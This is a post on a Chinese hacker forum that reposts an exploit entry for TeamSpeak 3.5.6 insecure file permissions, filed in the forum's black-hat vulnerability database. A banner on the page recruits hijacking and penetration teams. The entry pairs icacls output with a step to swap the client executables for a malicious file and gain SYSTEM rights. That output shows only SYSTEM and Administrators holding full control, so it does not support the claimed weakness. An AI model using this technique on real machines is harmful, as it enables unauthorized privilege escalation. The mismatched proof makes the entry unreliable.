跳转到帖子
诚邀seo站长,短信,劫持,渗透,代理,推广团队,博主,主播,各种资源流量大佬合作共赢【站外广告】

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

TeamSpeak 3.5.6 - Insecure File Permissions

CHT丨情报收集
CHT丨情报收集
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions
# Date: 2022-02-15
# Exploit Author: Aryan Chehreghani
# Contact: [email protected]
# Vendor Homepage: https://www.teamspeak.com
# Software Link: https://www.teamspeak.com/en/downloads
# Version: 3.5.6 
# Tested on: Windows 10 x64

# [ About - TeamSpeak ]:
#TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP),
#application for audio communication between users on a chat channel,
#much like a telephone conference call, Users typically use headphones with a microphone,
#The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels,
#The target audience for TeamSpeak is gamers, who can use the software to communicate,
#with other players on the same team of a multiplayer video game,
#Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.

# [ Description ]:
#The TeamSpeak Application was installed with insecure file permissions.
#It was found that all folder and file permissions were incorrectly configured during installation.
#It was possible to replace the service binary. 

# [ POC ]:

C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe

createfileassoc.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    WIN-FREMP1UB3LB\Administrator:(F)

error_report.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 WIN-FREMP1UB3LB\Administrator:(F)

package_inst.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 WIN-FREMP1UB3LB\Administrator:(F)

QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)
                       BUILTIN\Administrators:(F)
                       WIN-FREMP1UB3LB\Administrator:(F)

ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    WIN-FREMP1UB3LB\Administrator:(F)

Uninstall.exe NT AUTHORITY\SYSTEM:(F)
              BUILTIN\Administrators:(F)
              WIN-FREMP1UB3LB\Administrator:(F)

update.exe NT AUTHORITY\SYSTEM:(F)
           BUILTIN\Administrators:(F)
           WIN-FREMP1UB3LB\Administrator:(F)

Successfully processed 7 files; Failed processing 0 files

# [ Exploit - Privilege Escalation ]:
#Replace ts3client_win32.exe,update.exe,package_inst.exe,QtWebEngineProcess.exe,createfileassoc.exe and other ...
#with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。